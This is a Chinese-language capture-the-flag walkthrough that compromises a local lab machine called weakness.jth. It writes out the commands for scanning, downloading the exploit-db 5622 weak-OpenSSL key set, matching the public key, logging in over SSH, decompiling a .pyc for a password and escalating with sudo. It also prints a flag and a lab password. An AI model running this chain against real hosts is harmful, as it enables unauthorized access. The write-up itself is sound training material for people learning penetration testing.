靶机设置
设置为nat网卡模式,查看mac地址
靶机IP发现
nmap 192.168.112.0/24
靶机IP为192.168.112.131
目录扫描
因为80端口开放,进行目录扫描
访问浏览器
目录拼接
拼接/upload.php
发现一个文件上传页面
试图上传一个木马,发现不行
拼接/test/
发现需要很多密钥,在host文件中绑定
hosts文件中 绑定ip和weakness.jth
访问weakness.jth
目录扫描
在kali中也绑定host,方便后续使用
dirb "http://weakness.jth"
目录拼接
拼接/private
发现两个文件
打开mykey.pub
发现是加密的ssh公钥,尝试解密失败
打开note.txt
发现openssl的版本
msf寻找漏洞
因为知道了openssl的版本,去msf中寻找对应的exp
发现5622.txt适合,下载下来
查看
cat 5622.txt
把这个地址的私钥下载下来
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
tar -jxvf 5622.tar.bz2解压下来
将公钥下载下来
wget http://weakness.jth/private/files/mykey.pub
getshell
对比公钥和私钥
cat mykey.pub
grep -r -l "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw=="
尝试ssh连接
ssh -i rsa/2048/4161de56829de2fe64b9055711f531c1-2537 n30@192.168.112.131
getshell成功
提权
sudo -l发现需要输入密码
ls查看文件发现有一个user.txt
cat user.txt查看内容
25e3cd678875b601425c9356c8039f68
检查文件代码时,发现了一个python的编译文件,进行下载查看
file code
cp code /var/www/html
python3 -m http.server开启远程下载
wget http://192.168.112.131/code
mv code code.pyc该名为反编译文件
进行反编译
uncompyle6 code.pyc code.py
Username:n30
Password:dMASDNB!!#B!#!#33
再次查看发现有任何权限
直接sudo su
提权成功